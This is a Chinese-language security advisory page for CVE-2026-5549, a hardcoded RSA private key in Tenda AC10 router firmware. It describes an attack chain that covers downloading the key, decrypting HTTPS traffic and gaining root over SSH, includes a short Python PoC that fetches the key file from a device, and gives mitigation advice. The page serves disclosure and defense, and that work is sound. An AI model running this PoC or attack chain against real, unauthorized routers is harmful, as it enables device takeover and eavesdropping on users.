IPBUF安全漏洞报告
English
CVE-2026-5549 CVSS 5.3 中危

CVE-2026-5549 Tenda AC10 硬编码私钥漏洞

披露日期: 2026-04-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5549
漏洞类型
硬编码密钥
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tenda AC10

相关标签

Hardcoded KeyTendaIoTInformation DisclosureRouter

漏洞概述

Tenda AC10路由器特定版本存在硬编码加密密钥漏洞。由于固件内嵌了固定的RSA私钥,攻击者无需认证即可远程获取该密钥。利用此漏洞,攻击者可解密设备通信流量或获取系统控制权,造成严重信息泄露风险。

技术细节

该漏洞的根本原因是开发人员在固件编译过程中将RSA 2048位私钥直接嵌入了文件系统中的`/webroot_ro/pem/privkeySrv.pem`路径。这意味着所有运行该固件版本的Tenda AC10设备都共享同一个私钥。攻击者可以通过网络直接请求该路径获取私钥文件,或者提取固件镜像进行分析。获取私钥后,攻击者可以执行中间人攻击(MITM),拦截并解密设备与云端或其他客户端之间的HTTPS加密通信,甚至利用该私钥通过SSH协议获得设备的root权限,从而完全接管路由器,植入恶意软件或窃听用户上网数据。

攻击链分析

STEP 1
信息收集
攻击者识别出网络中的Tenda AC10设备,并确认其运行的是存在漏洞的固件版本。
STEP 2
漏洞利用
攻击者向目标设备发送HTTP请求,直接访问路径`/webroot_ro/pem/privkeySrv.pem`以下载私钥文件。
STEP 3
密钥解析
攻击者获取到PEM格式的RSA 2048位私钥。
STEP 4
权限提升与窃听
利用获取的私钥,攻击者解密HTTPS流量或通过SSH登录设备,获取系统最高权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable Tenda AC10 device target_ip = "192.168.0.1" vulnerability_path = "/webroot_ro/pem/privkeySrv.pem" url = f"http://{target_ip}{vulnerability_path}" try: # Send a GET request to retrieve the hardcoded private key response = requests.get(url, timeout=5) if response.status_code == 200: print("Successfully retrieved the private key:") print(response.text) print("\n[!] Vulnerability Confirmed: Hardcoded Private Key exposed.") else: print(f"Failed to retrieve file. Status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Tenda AC10 16.03.10.10_multi_TDE01

防御指南

临时缓解措施
建议用户立即检查设备固件版本,并关注Tenda官方发布的安全更新。在官方发布补丁前,应严格限制外部网络对路由器的访问,防止攻击者远程下载私钥文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表